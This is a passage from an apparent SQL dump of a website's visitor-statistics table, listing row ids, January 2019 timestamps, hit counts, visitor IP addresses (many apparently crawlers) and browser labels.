920,4,4,0,0,'141.8.142.103','other'),(365450,1546706923,6,6,0,0,'5.45.207.79','other'),(365451,1546706969,1,1,0,0,'95.108.181.54','other'),(365452,1546706992,7,7,0,0,'178.154.244.11','other'),(365453,1546707200,1,1,0,0,'40.77.167.70','other'),(365454,1546707305,1,1,0,0,'157.55.39.129','other'),(365455,1546707508,4,4,0,0,'87.250.224.47','other'),(365456,1546707540,5,5,0,0,'87.250.224.65','other'),(365457,1546707595,11,11,0,0,'5.45.207.19','other'),(365458,1546707659,8,8,0,0,'95.108.213.4','other'),(365459,1546707686,1,1,0,0,'216.244.66.241','other'),(365460,1546707810,1,1,0,0,'66.249.66.42','chrome'),(365461,1546707843,2,2,0,0,'213.180.203.9','other'),(365462,1546707924,3,3,0,0,'178.154.244.11','other'),(365463,1546707944,8,8,0,0,'5.45.207.79','other'),(365464,1546707981,2,2,0,0,'141.8.142.103','other'),(365465,1546708134,1,1,0,0,'54.36.149.32','other'),(365466,1546708154,1,1,0,0,'18.220.216.237','firefox'),(365467,1546708219,1,1,0,0,'157.55.39.129','other'),(365468,1546708232,1,1,0,0,'54.36.149.65','other'),(365469,1546708257,1,1,0,0,'54.36.148.144','other'),(365470,1546708260,1,1,0,0,'178.154.171.27','other'),(365471,1546708399,2,2,0,0,'37.9.113.20','other'),(365472,1546708525,1,1,0,0,'5.45.207.19','other'),(365473,1546708687,1,1,0,0,'66.249.66.154','chrome'),(365474,1546708760,1,1,0,0,'207.46.13.107','other'),(365475,1546708785,1,1,0,0,'66.249.66.157','chrome'),(365476,1546708786,1,1,0,0,'66.249.66.156','chrome'),(365477,1546709106,1,1,0,0,'66.249.66.59','chrome'),(365479,1546709158,11,11,0,0,'216.244.66.241','other'),(365480,1546709351,1,1,0,0,'54.36.148.43','other'),(365481,1546709421,1,1,0,0,'54.36.149.63','other'),(365482,1546709514,1,1,0,0,'178.133.48.219','chrome'),(365483,1546709970,1,1,0,0,'54.36.149.53','other'),(365484,1546710028,1,1,0,0,'95.163.255.112','other'),(365485,1546710119,1,1,0,0,'216.244.66.241','other'),(365486,1546710206,1,1,0,0,'54.36.148.229','other'),(365487,1546710283,1,1,0,0,'207.46.13.107','other'),(365488,1546710355,2,2,0,0,'95.163.255.104','other'),(365489,1546710453,1,1,0,0,'178.154.244.11','other'),(365490,1546710752,1,1,0,0,'95.163.255.107','other'),(365491,1546710881,1,1,0,0,'95.163.255.115','other'),(365492,1546710952,1,1,0,0,'54.36.148.90','other'),(365493,1546710955,1,1,0,0,'95.163.255.106','other'),(365494,1546711383,1,1,0,0,'54.36.149.27','other'),(365495,1546711535,1,1,0,0,'46.200.196.11','chrome'),(365496,1546711742,1,1,0,0,'180.76.15.22','other'),(365497,1546711815,1,1,0,0,'46.229.168.147','other'),(365498,1546711818,1,1,0,0,'54.36.149.82','other'),(365499,1546711947,4,4,0,0,'216.244.66.241','other'),(365500,1546711965,1,1,0,0,'54.36.149.20','other'),(365501,1546712159,1,1,0,0,'157.55.39.132','other'),(365502,1546712606,1,1,0,0,'194.44.176.37','chrome'),(365503,1546712769,1,1,0,0,'54.36.149.55','other'),(365504,1546712823,1,1,0,0,'46.229.168.150','other'),(365505,1546712843,1,1,0,0,'54.36.148.36','other'),(365506,1546712849,1,1,0,0,'66.249.93.205','chrome'),(365507,1546712850,1,1,0,0,'66.249.93.217','chrome'),(365508,1546712927,2,2,0,0,'216.244.66.241','other'),(365509,1546712980,1,1,0,0,'8.29.198.27','other'),(365510,1546713042,2,2,0,0,'91.209.11.236','other'),(365511,1546713321,2,2,0,0,'66.249.66.156','chrome'),(365512,1546713359,1,1,0,0,'5.45.207.79','other'),(365513,1546713371,1,1,0,0,'87.250.224.47','other'),(365514,1546713599,2,2,0,0,'141.8.142.103','other'),(365515,1546713905,1,1,0,0,'46.229.168.143','other'),(365516,1546714077,1,1,0,0,'8.29.198.26','other'),(365517,1546714163,1,1,0,0,'66.249.66.155','chrome'),(365518,1546714340,3,3,0,0,'66.249.83.218','chrome'),(365519,1546714386,1,1,0,0,'93.183.210.86','chrome'),(365520,1546714535,2,2,0,0,'178.154.244.11','other'),(365521,1546714586,1,1,0,0,'141.8.142.103','other'),(365522,1546714652,1,1,0,0,'77.127.54.85','chrome'),(365523,1546714713,2,2,0,0,'46.229.168.142','other'),(365524,1546714799,3,3,0,0,'216.244.66.241','other'),(365525,1546715048,2,2,0,0,'5.45.207.19','other'),(365526,1546715227,1,1,0,0,'77.254.110.52','chrome'),(365527,1546715302,1,1,0,0,'93.170.117.40','chrome'),(365528,1546715311,1,1,0,0,'157.55.39.132','other'),(365529,1546715609,1,1,0,0,'46.229.168.140','other'),(365530,1546715742,1,1,0,0,'180.76.15.136','other'),(365531,1546715743,1,1,0,0,'180.76.15.152','other'),(365532,1546715852,3,3,0,0,'216.244.66.241','other'),(365533,1546715902,2,2,0,0,'66.249.66.152','chrome'),(365534,1546716070,1,1,0,0,'66.249.66.154','chrome'),(365535,1546716198,1,1,0,0,'46.229.168.144','other'),(365536,1546716200,1,1,0,0,'46.229.168.137','other'),(365537,1546716763,1,1,0,0,'54.36.148.170','other'),(365538,1546716908,1,1,0,0,'46.229.168.145','other'),(365539,1546717132,1,1,0,0,'193.34.172.190','other'),(365540,1546717196,1,1,0,0,'54.36.149.33','other'),(365541,1546717291,1,1,0,0,'141.8.142.81','other'),(365542,1546717714,15,15,0,0,'216.244.66.241','other'),(365543,1546717987,1,1,0,0,'193.186.9.126','chrome'),(365544,1546718056,1,1,0,0,'54.36.149.72','other'),(365545,1546718541,1,1,0,0,'54.36.149.24','other'),(365546,1546718685,1,1,0,0,'194.44.253.82','chrome'),(365547,1546718812,1,1,0,0,'178.154.244.11','other'),(365548,1546718987,1,1,0,0,'37.115.217.112','chrome'),(365549,1546718992,1,1,0,0,'207.46.13.107','other'),(365550,1546718995,1,1,0,0,'54.36.149.74','other'),(365551,1546719059,1,1,0,0,'66.249.66.156','chrome'),(365552,1546719077,1,1,0,0,'54.36.148.161','other'),(365553,1546719390,1,1,0,0,'66.249.66.59','chrome'),(365554,1546719391,1,1,0,0,'66.249.66.40','chrome'),(365555,1546719613,1,1,0,0,'157.55.39.129','other'),(365556,1546720116,1,1,0,0,'194.44.253.82','chrome'),(365557,1546720464,2,2,0,0,'54.165.59.7','other'),(365558,1546720561,9,9,0,0,'216.244.66.241','other'),(365559,1546720681,1,1,0,0,'157.55.39.132','other'),(365560,1546720690,1,1,0,0,'66.249.66.152','chrome'),(365561,1546720714,1,1,0,0,'5.45.207.79','other'),(365562,1546720842,2,2,0,0,'5.45.207.19','other'),(365563,1546721042,1,1,0,0,'54.36.148.136','other'),(365564,1546721131,1,1,0,0,'54.36.148.61','other'),(365565,1546721338,1,1,0,0,'66.249.66.154','chrome'),(365566,1546721457,1,1,0,0,'54.165.59.7','other'),(365567,1546721487,1,1,0,0,'54.36.149.77','other'),(365568,1546721684,1,1,0,0,'46.229.168.154','other'),(365569,1546721693,1,1,0,0,'46.229.168.142','other'),(365570,1546721710,1,1,0,0,'5.45.207.79','other'),(365571,1546721738,1,1,0,0,'54.36.149.38','other'),(365572,1546721957,1,1,0,0,'5.92.20.34','chrome'),(365573,1546722266,1,1,0,0,'216.244.66.241','other'),(365574,1546722351,1,1,0,0,'46.229.168.148','other'),(365575,1546722353,1,1,0,0,'46.229.168.153','other'),(365576,1546722382,1,1,0,0,'66.249.66.44','chrome'),(365577,1546722753,1,1,0,0,'66.249.66.61','chrome'),(365578,1546722754,1,1,0,0,'66.249.66.40','chrome'),(365579,1546723019,1,1,0,0,'54.36.148.106','other'),(365580,1546723186,1,1,0,0,'207.46.13.134','other'),(365581,1546723527,5,5,0,0,'216.244.66.241','other'),(365582,1546723718,1,1,0,0,'31.41.88.148','chrome'),(365583,1546723817,1,1,0,0,'8.29.198.27','other'),(365584,1546724193,1,1,0,0,'157.55.39.132','other'),(365585,1546724547,1,1,0,0,'157.55.39.129','other'),(365586,1546724919,1,1,0,0,'8.29.198.27','other'),(365587,1546725158,3,3,0,0,'207.46.13.107','other'),(365588,1546725799,1,1,0,0,'54.36.148.95','other'),(365589,1546726099,1,1,0,0,'46.229.168.139','other'),(365590,1546726278,11,11,0,0,'216.244.66.241','other'),(365591,1546726426,1,1,0,0,'54.36.148.40','other'),(365592,1546726428,1,1,0,0,'54.36.148.75','other'),(365593,1546726820,1,1,0,0,'66.249.66.42','chrome'),(365594,1546727208,1,1,0,0,'66.249.66.40','chrome'),(365595,1546727213,1,1,0,0,'66.249.66.152','chrome'),(365596,1546727254,2,2,0,0,'216.244.66.241','other'),(365597,1546727256,1,1,0,0,'66.249.66.154','chrome'),(365598,1546727467,2,2,0,0,'66.249.66.44','chrome'),(365599,1546727660,1,1,0,0,'157.55.39.132','other'),(365600,1546727779,1,1,0,0,'66.249.66.57','chrome'),(365601,1546727983,1,1,0,0,'46.229.168.143','other'),(365602,1546728019,1,1,0,0,'95.108.213.4','other'),(365603,1546728072,1,1,0,0,'87.250.224.47','other'),(365604,1546728344,1,1,0,0,'66.249.66.155','chrome'),(365605,1546728345,1,1,0,0,'66.249.66.152','chrome'),(365606,1546728994,1,1,0,0,'66.249.66.154','chrome'),(365607,1546729103,1,1,0,0,'54.36.149.32','other'),(365608,1546729104,8,8,0,0,'216.244.66.241','other'),(365609,1546729219,1,1,0,0,'54.36.148.46','other'),(365610,1546729273,2,2,0,0,'66.249.66.152','chrome'),(365611,1546729606,1,1,0,0,'54.36.148.245','other'),(365612,1546729649,1,1,0,0,'66.249.66.157','chrome'),(365613,1546729945,1,1,0,0,'54.36.148.223','other'),(365614,1546730451,1,1,0,0,'66.249.66.156','chrome'),(365615,1546730730,1,1,0,0,'46.229.168.145','other'),(365616,1546731639,1,1,0,0,'93.171.163.245','other'),(365617,1546732050,1,1,0,0,'54.36.148.74','other'),(365618,1546732143,1,1,0,0,'54.36.148.139','other'),(365619,1546732169,2,2,0,0,'216.244.66.241','other'),(365620,1546732467,1,1,0,0,'54.36.148.79','other'),(365621,1546732752,1,1,0,0,'13.66.139.0','other'),(365622,1546732774,1,1,0,0,'54.36.148.143','other'),(365623,1546732874,1,1,0,0,'54.36.148.244','other'),(365624,1546733083,1,1,0,0,'46.229.168.145','other'),(365625,1546733797,1,1,0,0,'54.36.148.234','other'),(365626,1546734646,1,1,0,0,'8.29.198.25','other'),(365627,1546734714,9,9,0,0,'216.244.66.241','other'),(365628,1546734776,1,1,0,0,'157.55.39.132','other'),(365629,1546734894,1,1,0,0,'54.36.148.222','other'),(365630,1546734941,1,1,0,0,'54.36.148.166','other'),(365631,1546735059,2,2,0,0,'46.229.168.135','other'),(365632,1546735374,1,1,0,0,'46.229.168.154','other'),(365633,1546735618,1,1,0,0,'95.163.255.192','other'),(365634,1546735621,1,1,0,0,'216.244.66.241','other'),(365636,1546735696,3,3,0,0,'5.45.207.79','other'),(365637,1546735751,1,1,0,0,'8.29.198.26','other'),(365638,1546735808,1,1,0,0,'207.46.13.107','other'),(365639,1546736013,1,1,0,0,'178.154.171.24','other'),(365640,1546736155,1,1,0,0,'54.36.148.60','other'),(365641,1546736174,1,1,0,0,'51.38.113.64','other'),(365642,1546736245,1,1,0,0,'54.36.148.117','other'),(365643,1546736586,1,1,0,0,'66.249.66.156','chrome'),(365644,1546736640,1,1,0,0,'54.36.149.6','other'),(365645,1546736724,4,4,0,0,'216.244.66.241','other'),(365646,1546737052,1,1,0,0,'157.55.39.129','other'),(365647,1546737729,8,8,0,0,'216.244.66.241','other'),(365648,1546738299,1,1,0,0,'66.249.66.156','chrome'),(365650,1546738467,1,1,0,0,'46.229.168.130','other'),(365651,1546738468,1,1,0,0,'46.229.168.129','other'),(365652,1546738882,1,1,0,0,'54.36.148.81','other'),(365653,1546739137,1,1,0,0,'46.229.168.138','other'),(365654,1546739751,1,1,0,0,'46.229.168.140','other'),(365655,1546740296,4,4,0,0,'216.244.66.241','other'),(365656,1546740360,2,2,0,0,'40.77.167.80','other'),(365657,1546740545,1,1,0,0,'54.36.148.39','other'),(365658,1546740670,1,1,0,0,'54.36.148.174','other'),(365659,1546740680,1,1,0,0,'54.36.148.165','other'),(365660,1546741029,1,1,0,0,'54.36.148.167','other'),(365661,1546741174,1,1,0,0,'46.229.168.154','other'),(365662,1546741358,1,1,0,0,'54.36.148.198','other'),(365663,1546741371,3,3,0,0,'216.244.66.241','other'),(365664,1546741390,2,2,0,0,'207.46.13.107','other'),(365665,1546741727,1,1,0,0,'54.36.148.239','other'),(365666,1546741760,1,1,0,0,'88.99.2.203','other'),(365667,1546742026,1,1,0,0,'54.36.148.217','other'),(365668,1546742169,1,1,0,0,'46.229.168.153','other'),(365669,1546742380,1,1,0,0,'46.229.168.139','other'),(365670,1546742890,1,1,0,0,'54.36.148.68','other'),(365671,1546743018,2,2,0,0,'34.213.223.207','chrome'),(365672,1546743073,1,1,0,0,'46.229.168.145','other'),(365673,1546743158,9,9,0,0,'216.244.66.241','other'),(365674,1546743255,1,1,0,0,'46.229.168.151','other'),(365675,1546743257,1,1,0,0,'46.229.168.154','other'),(365676,1546743267,1,1,0,0,'54.36.149.41','other'),(365677,1546743462,1,1,0,0,'180.76.15.19','other'),(365678,1546743518,1,1,0,0,'157.55.39.239','other'),(365679,1546743568,1,1,0,0,'178.154.244.11','other'),(365680,1546743668,2,2,0,0,'157.55.39.132','other'),(365681,1546743816,1,1,0,0,'141.8.142.103','other'),(365682,1546744159,1,1,0,0,'207.46.13.107','other'),(365683,1546744367,1,1,0,0,'46.229.168.141','other'),(365684,1546744424,1,1,0,0,'54.36.148.174','other'),(365685,1546744477,1,1,0,0,'95.163.255.62','other'),(365686,1546744480,1,1,0,0,'95.163.255.65','other'),(365687,1546744509,1,1,0,0,'54.36.148.46','other'),(365688,1546744593,1,1,0,0,'54.36.148.61','other'),(365689,1546744811,2,2,0,0,'66.249.66.156','chrome'),(365690,1546745137,2,2,0,0,'157.55.39.239','other'),(365691,1546745462,1,1,0,0,'180.76.15.163','other'),(365692,1546745463,1,1,0,0,'180.76.15.137','other'),(365693,1546745468,1,1,0,0,'8.29.198.27','other'),(365694,1546745565,1,1,0,0,'54.36.149.51','other'),(365695,1546745651,1,1,0,0,'54.36.148.132','other'),(365696,1546745891,11,11,0,0,'216.244.66.241','other'),(365697,1546745933,1,1,0,0,'54.36.148.244','other'),(365698,1546746152,1,1,0,0,'46.229.168.135','other'),(365699,1546746356,1,1,0,0,'178.154.244.11','other'),(365700,1546746585,1,1,0,0,'8.29.198.25','other'),(365701,1546746673,1,1,0,0,'54.36.149.24','other'),(365702,1546746823,1,1,0,0,'54.36.148.61','other'),(365703,1546747081,1,1,0,0,'54.36.148.197','other'),(365704,1546747208,1,1,0,0,'46.229.168.147','other'),(365705,1546747210,1,1,0,0,'46.229.168.141','other'),(365706,1546747562,1,1,0,0,'54.36.149.48','other'),(365707,1546748264,1,1,0,0,'54.36.149.29','other'),(365708,1546748539,1,1,0,0,'66.249.66.155','chrome'),(365710,1546748706,7,7,0,0,'216.244.66.241','other'),(365711,1546749014,1,1,0,0,'88.99.2.203','other'),(365712,1546749177,1,1,0,0,'54.36.149.2','other'),(365713,1546749481,1,1,0,0,'54.36.148.159','other'),(365714,1546749789,1,1,0,0,'54.36.148.142','other'),(365715,1546749796,1,1,0,0,'77.126.117.163','chrome'),(365716,1546749851,1,1,0,0,'46.229.168.152','other'),(365717,1546749912,1,1,0,0,'54.36.148.196','other'),(365718,1546749938,1,1,0,0,'216.244.66.241','other'),(365719,1546750121,1,1,0,0,'46.229.168.135','other'),(365720,1546750691,1,1,0,0,'54.36.149.99','other'),(365721,1546750715,1,1,0,0,'157.55.39.195','other'),(365722,1546751150,1,1,0,0,'54.36.148.137','other'),(365723,1546751363,1,1,0,0,'54.36.148.98','other'),(365724,1546751423,1,1,0,0,'157.55.39.132','other'),(365725,1546751454,1,1,0,0,'54.36.148.161','other'),(365726,1546751491,13,13,0,0,'216.244.66.241','other'),(365727,1546751815,1,1,0,0,'134.249.215.31','chrome'),(365728,1546752050,1,1,0,0,'46.229.168.130','other'),(365729,1546752169,2,2,0,0,'40.77.167.80','other'),(365730,1546752199,1,0,1,0,'66.249.66.155',''),(365732,1546752540,1,1,0,0,'54.36.148.196','other'),(365733,1546752800,3,3,0,0,'5.45.207.19','other'),(365734,1546753051,1,1,0,0,'37.9.113.103','other'),(365735,1546753067,3,3,0,0,'216.244.66.241','other'),(365736,1546753828,1,1,0,0,'54.36.149.42','other'),(365737,1546754301,7,7,0,0,'216.244.66.241','other'),(365738,1546754782,2,2,0,0,'185.117.215.9','other'),(365739,1546755310,1,1,0,0,'54.36.148.133','other'),(365740,1546755410,1,1,0,0,'66.249.66.40','chrome'),(365741,1546755412,1,1,0,0,'54.36.149.45','other'),(365742,1546755586,1,1,0,0,'37.188.149.172','chrome'),(365743,1546755616,1,1,0,0,'151.36.145.243','chrome'),(365744,1546755634,1,1,0,0,'31.129.244.205','chrome'),(365745,1546756301,1,1,0,0,'8.29.198.26','other'),(365746,1546756417,1,1,0,0,'212.90.49.186','other'),(365747,1546756605,1,1,0,0,'40.77.167.80','other'),(365748,1546756742,1,1,0,0,'46.229.168.149','other'),(365749,1546756901,4,4,0,0,'5.45.207.19','other'),(365750,1546757090,1,1,0,0,'66.249.93.202','chrome'),(365752,1546757127,1,1,0,0,'176.118.54.180','other'),(365753,1546757259,3,3,0,0,'216.244.66.241','other'),(365754,1546757335,10,10,0,0,'178.154.244.11','other'),(365755,1546757381,1,1,0,0,'54.36.149.79','other'),(365756,1546757432,1,1,0,0,'8.29.198.26','other'),(365757,1546757555,6,6,0,0,'141.8.142.103','other'),(365758,1546757608,1,1,0,0,'54.36.148.24','other'),(365759,1546757631,7,7,0,0,'5.45.207.79','other'),(365760,1546757654,1,1,0,0,'95.108.181.54','other'),(365761,1546757674,4,4,0,0,'95.108.213.4','other'),(365762,1546757757,3,3,0,0,'87.250.224.65','other'),(365763,1546757765,6,6,0,0,'87.250.224.47','other'),(365764,1546757924,5,5,0,0,'5.45.207.19','other'),(365765,1546757948,1,1,0,0,'54.36.148.70','other'),(365766,1546757953,1,1,0,0,'46.229.168.150','other'),(365767,1546758010,4,4,0,0,'37.9.113.148','other'),(365768,1546758089,1,1,0,0,'178.154.244.21','other'),(365769,1546758115,1,1,0,0,'95.108.213.50','other'),(365770,1546758132,2,2,0,0,'37.9.113.20','other'),(365771,1546758284,1,1,0,0,'157.55.39.195','other'),(365772,1546758312,1,1,0,0,'46.229.168.151','other'),(365773,1546758321,6,6,0,0,'178.154.244.11','other'),(365774,1546758364,1,1,0,0,'66.249.66.59','chrome'),(365776,1546758372,1,1,0,0,'37.9.113.103','other'),(365777,1546758436,1,1,0,0,'216.244.66.241','other'),(365778,1546758443,1,1,0,0,'54.36.148.224','other'),(365779,1546758585,1,1,0,0,'46.229.168.135','other'),(365780,1546758704,1,1,0,0,'87.250.224.47','other'),(365781,1546758753,4,4,0,0,'141.8.142.103','other'),(365782,1546758827,1,1,0,0,'5.45.207.79','other'),(365783,1546758840,1,1,0,0,'46.229.168.152','other'),(365784,1546758863,1,1,0,0,'157.55.39.175','other'),(365785,1546759187,1,1,0,0,'157.55.39.174','other'),(365786,1546759308,6,6,0,0,'178.154.244.11','other'),(365787,1546759374,2,2,0,0,'5.45.207.19','other'),(365788,1546759556,1,1,0,0,'95.108.213.4','other'),(365789,1546759630,1,1,0,0,'54.36.148.243','other'),(365790,1546759727,37,37,0,0,'46.4.52.175','other'),(365791,1546759785,3,3,0,0,'5.45.207.79','other'),(365792,1546759803,1,1,0,0,'141.8.142.103','other'),(365793,1546759898,9,9,0,0,'31.13.127.18','other'),(365794,1546759899,3,3,0,0,'31.13.127.6','other'),(365796,1546759900,2,2,0,0,'31.13.127.9','other'),(365808,1546759901,3,3,0,0,'31.13.127.4','other'),(365812,1546759902,3,3,0,0,'31.13.127.7','other'),(365816,1546759903,3,3,0,0,'31.13.127.1','other'),(365832,1546759904,1,1,0,0,'31.13.127.12','other'),(365840,1546759938,1,1,0,0,'87.250.224.47','other'),(365841,1546759954,1,1,0,0,'54.36.148.40','other'),(365842,1546760020,70,70,0,0,'217.182.65.118','other'),(365843,1546760021,3,3,0,0,'216.244.66.241','other'),(365844,1546760022,1,1,0,0,'46.229.168.133','other'),(365845,1546760259,2,2,0,0,'91.196.178.134','firefox'),(365846,1546760574,1,1,0,0,'46.63.16.98','chrome'),(365847,1546760646,1,1,0,0,'54.36.148.105','other'),(365848,1546760892,2,2,0,0,'37.53.147.207','chrome'),(365849,1546760922,1,1,0,0,'46.211.119.108','chrome'),(365850,1546761174,1,1,0,0,'54.36.148.19','other'),(365851,1546761193,1,1,0,0,'91.207.245.136','chrome'),(365852,1546761195,1,1,0,0,'54.36.149.43','other'),(365853,1546761585,1,1,0,0,'40.77.167.80','other'),(365854,1546761688,1,1,0,0,'157.55.39.175','other'),(365855,1546761933,1,1,0,0,'95.133.238.90','chrome'),(365856,1546761952,1,1,0,0,'46.149.186.21','chrome'),(365857,1546762005,2,2,0,0,'5.45.207.79','other'),(365858,1546762090,1,1,0,0,'157.55.39.168','other'),(365859,1546762191,3,3,0,0,'37.73.170.90','chrome'),(365860,1546762415,2,2,0,0,'178.154.244.11','other'),(365861,1546762452,1,1,0,0,'207.244.157.10','other'),(365862,1546762509,1,1,0,0,'54.36.148.97','other'),(365863,1546762641,2,2,0,0,'40.77.167.80','other'),(365864,1546762648,1,1,0,0,'54.36.148.64','other'),(365865,1546762922,5,5,0,0,'216.244.66.241','other'),(365866,1546762974,1,1,0,0,'185.17.127.232','chrome'),(365867,1546763025,1,1,0,0,'66.249.66.42','chrome'),(365868,1546763164,1,1,0,0,'66.249.66.154','chrome'),(365869,1546763636,1,1,0,0,'141.8.142.103','other'),(365870,1546763657,1,1,0,0,'178.154.244.11','other'),(365871,1546763711,1,1,0,0,'54.36.148.20','other'),(365872,1546763719,1,1,0,0,'46.211.68.166','chrome'),(365873,1546763728,1,1,0,0,'46.229.168.149','other'),(365874,1546764485,1,1,0,0,'54.36.148.206','other'),(365875,1546765035,1,1,0,0,'91.124.44.251','chrome'),(365876,1546765044,1,1,0,0,'46.229.168.139','other'),(365877,1546765052,1,1,0,0,'80.252.153.33','firefox'),(365878,1546765309,1,1,0,0,'46.211.25.97','chrome'),(365879,1546765369,1,1,0,0,'188.163.43.165','chrome'),(365880,1546765493,1,1,0,0,'86.139.87.245','other'),(365881,1546765498,1,1,0,0,'54.36.148.229','other'),(365882,1546765542,2,2,0,0,'157.55.39.109','other'),(365883,1546765653,1,1,0,0,'195.191.58.102','chrome'),(365884,1546765696,1,1,0,0,'92.113.211.66','other'),(365885,1546765705,8,8,0,0,'216.244.66.241','other'),(365886,1546765744,1,1,0,0,'213.162.73.182','other'),(365887,1546765792,1,1,0,0,'46.229.168.143','other'),(365888,1546765833,1,1,0,0,'195.238.117.12','chrome'),(365889,1546766137,1,1,0,0,'46.211.119.102','chrome'),(365890,1546766146,1,1,0,0,'188.163.4.101','chrome'),(365891,1546766189,1,1,0,0,'40.77.167.80','other'),(365892,1546766241,1,1,0,0,'37.73.86.97','chrome'),(365893,1546766561,1,1,0,0,'46.211.74.158','chrome'),(365894,1546766619,1,1,0,0,'46.229.168.152','other'),(365895,1546766621,1,1,0,0,'46.211.74.154','chrome'),(365896,1546766779,1,1,0,0,'54.36.149.16','other'),(365897,1546766835,2,2,0,0,'216.244.66.241','other'),(365898,1546766869,1,1,0,0,'46.133.194.133','chrome'),(365899,1546767073,1,1,0,0,'46.229.168.130','other'),(365900,1546767124,1,1,0,0,'8.29.198.26','other'),(365901,1546767252,2,2,0,0,'46.211.135.56','chrome'),(365902,1546767271,1,1,0,0,'40.77.167.80','other'),(365903,1546767333,1,1,0,0,'54.36.148.170','other'),(365904,1546767442,1,1,0,0,'89.185.0.39','chrome'),(365905,1546767514,1,1,0,0,'77.120.76.32','chrome'),(365906,1546767639,1,1,0,0,'46.229.168.139','other'),(365907,1546767706,2,2,0,0,'188.163.116.213','chrome'),(365908,1546767766,1,1,0,0,'66.249.93.216','chrome'),(365909,1546767994,1,1,0,0,'54.36.148.174','other'),(365910,1546768106,18,18,0,0,'136.243.151.90','other'),(365911,1546768282,1,1,0,0,'8.29.198.27','other'),(365912,1546768328,1,1,0,0,'178.235.185.193','chrome'),(365913,1546768345,1,1,0,0,'91.236.184.27','chrome'),(365914,1546768447,2,2,0,0,'66.249.66.156','chrome'),(365915,1546768448,1,1,0,0,'66.249.66.152','chrome'),(365916,1546768539,9,9,0,0,'216.244.66.241','other'),(365917,1546768575,1,1,0,0,'54.36.148.49','other'),(365918,1546768819,1,1,0,0,'194.54.160.92','chrome'),(365919,1546769008,13,13,0,0,'136.243.151.90','other'),(365920,1546769676,1,1,0,0,'216.244.66.241','other'),(365921,1546769911,4,4,0,0,'136.243.151.90','other'),(365922,1546770129,1,1,0,0,'46.229.168.139','other'),(365923,1546770339,1,1,0,0,'54.36.148.86','other'),(365924,1546770355,1,1,0,0,'195.189.196.51','chrome'),(365925,1546770595,1,1,0,0,'193.110.18.53','chrome'),(365926,1546771017,1,1,0,0,'207.46.13.51','other'),(365927,1546771438,6,6,0,0,'216.244.66.241','other'),(365928,1546771451,1,1,0,0,'46.211.131.210','chrome'),(365929,1546771694,1,1,0,0,'54.36.148.97','other'),(365930,1546771879,1,1,0,0,'54.36.148.141','other'),(365931,1546772015,1,1,0,0,'46.201.129.145','chrome'),(365932,1546772082,2,2,0,0,'60.191.38.77','firefox'),(365933,1546772510,1,1,0,0,'193.169.125.178','firefox'),(365934,1546772573,1,1,0,0,'92.113.58.123','chrome'),(365935,1546772631,1,1,0,0,'178.148.70.239','chrome'),(365936,1546772667,1,1,0,0,'5.45.207.19','other'),(365937,1546772810,1,1,0,0,'93.73.133.197','chrome'),(365938,1546772831,1,1,0,0,'40.77.167.80','other'),(365939,1546772902,1,1,0,0,'95.108.181.54','other'),(365940,1546772952,1,1,0,0,'31.148.255.18','chrome'),(365941,1546772956,1,1,0,0,'54.36.149.25','other'),(365942,1546773335,1,1,0,0,'5.45.207.79','other'),(365943,1546773432,1,1,0,0,'37.9.113.148','other'),(365944,1546773471,2,2,0,0,'178.154.244.11','other'),(365945,1546773938,1,1,0,0,'54.36.148.246','other'),(365946,1546774072,1,1,0,0,'5.45.207.19','other'),(365947,1546774270,6,6,0,0,'216.244.66.241','other'),(365948,1546774298,1,1,0,0,'37.73.134.240','chrome'),(365949,1546774620,1,1,0,0,'66.249.66.157','chrome'),(365950,1546774622,1,1,0,0,'66.249.66.154','chrome'),(365951,1546774887,1,1,0,0,'54.36.149.53','other'),(365952,1546775176,1,1,0,0,'54.36.148.52','other'),(365953,1546775262,1,1,0,0,'46.229.168.129','other'),(365954,1546775263,1,1,0,0,'46.229.168.136','other'),(365955,1546775326,2,2,0,0,'216.244.66.241','other'),(365956,1546775414,1,1,0,0,'193.8.79.199','chrome'),(365957,1546775451,1,1,0,0,'185.151.87.50','chrome'),(365958,1546775999,1,1,0,0,'95.132.11.217','chrome'),(365959,1546776196,1,1,0,0,'46.133.209.159','other'),(365960,1546776210,1,1,0,0,'81.35.35.142','other'),(365961,1546776517,1,1,0,0,'141.8.142.103','other'),(365962,1546776522,1,1,0,0,'178.154.244.11','other'),(365963,1546776627,1,1,0,0,'31.134.127.133','chrome'),(365964,1546776875,1,1,0,0,'31.134.90.122','chrome'),(365965,1546777081,1,1,0,0,'46.211.50.65','other'),(365966,1546777088,3,3,0,0,'216.244.66.241','other'),(365967,1546777532,1,1,0,0,'81.35.35.142','other'),(365968,1546777791,1,1,0,0,'46.173.172.229','chrome'),(365969,1546777944,1,1,0,0,'8.29.198.25','other'),(365970,1546778058,1,1,0,0,'207.46.13.6','other'),(365971,1546778177,1,1,0,0,'216.244.66.241','other'),(365972,1546778258,1,1,0,0,'95.67.81.164','other'),(365973,1546778307,1,1,0,0,'46.229.168.139','other'),(365974,1546778685,1,1,0,0,'95.163.255.113','other'),(365975,1546778687,1,1,0,0,'95.163.255.105','other'),(365976,1546778716,1,1,0,0,'46.211.37.177','chrome'),(365977,1546778963,1,1,0,0,'188.163.32.109','chrome'),(365978,1546778986,1,1,0,0,'134.249.85.20','chrome'),(365979,1546779059,1,1,0,0,'188.163.97.10','chrome'),(365980,1546779117,1,1,0,0,'8.29.198.27','other'),(365981,1546779521,1,1,0,0,'46.229.168.153','other'),(365982,1546779716,1,1,0,0,'207.46.13.51','other'),(365983,1546779938,8,8,0,0,'216.244.66.241','other'),(365984,1546779967,1,1,0,0,'54.36.148.84','other'),(365985,1546780013,1,1,0,0,'5.58.166.50','chrome'),(365986,1546780217,1,1,0,0,'95.163.255.116','other'),(365987,1546780260,1,1,0,0,'95.163.255.119','other'),(365988,1546780801,2,2,0,0,'178.154.244.11','other'),(365989,1546780819,1,1,0,0,'37.73.226.130','chrome'),(365990,1546780890,1,1,0,0,'95.163.255.107','other'),(365991,1546780994,1,1,0,0,'216.244.66.241','other'),(365992,1546781015,1,1,0,0,'109.122.60.17','chrome'),(365993,1546781086,1,1,0,0,'46.229.168.147','other'),(365994,1546781294,1,1,0,0,'5.45.207.79','other'),(365995,1546781563,1,1,0,0,'180.76.15.28','other'),(365996,1546781680,1,1,0,0,'54.36.148.58','other'),(365997,1546781723,1,1,0,0,'95.163.255.115','other'),(365998,1546781816,1,1,0,0,'54.36.148.32','other'),(365999,1546781846,1,1,0,0,'46.229.168.143','other'),(366000,1546781855,1,1,0,0,'54.36.149.98','other'),(366001,1546782140,1,1,0,0,'46.211.47.173','chrome'),(366002,1546782271,1,1,0,0,'188.163.34.92','chrome'),(366003,1546782450,1,1,0,0,'157.55.39.233','other'),(366004,1546782518,2,2,0,0,'178.154.244.11','other'),(366005,1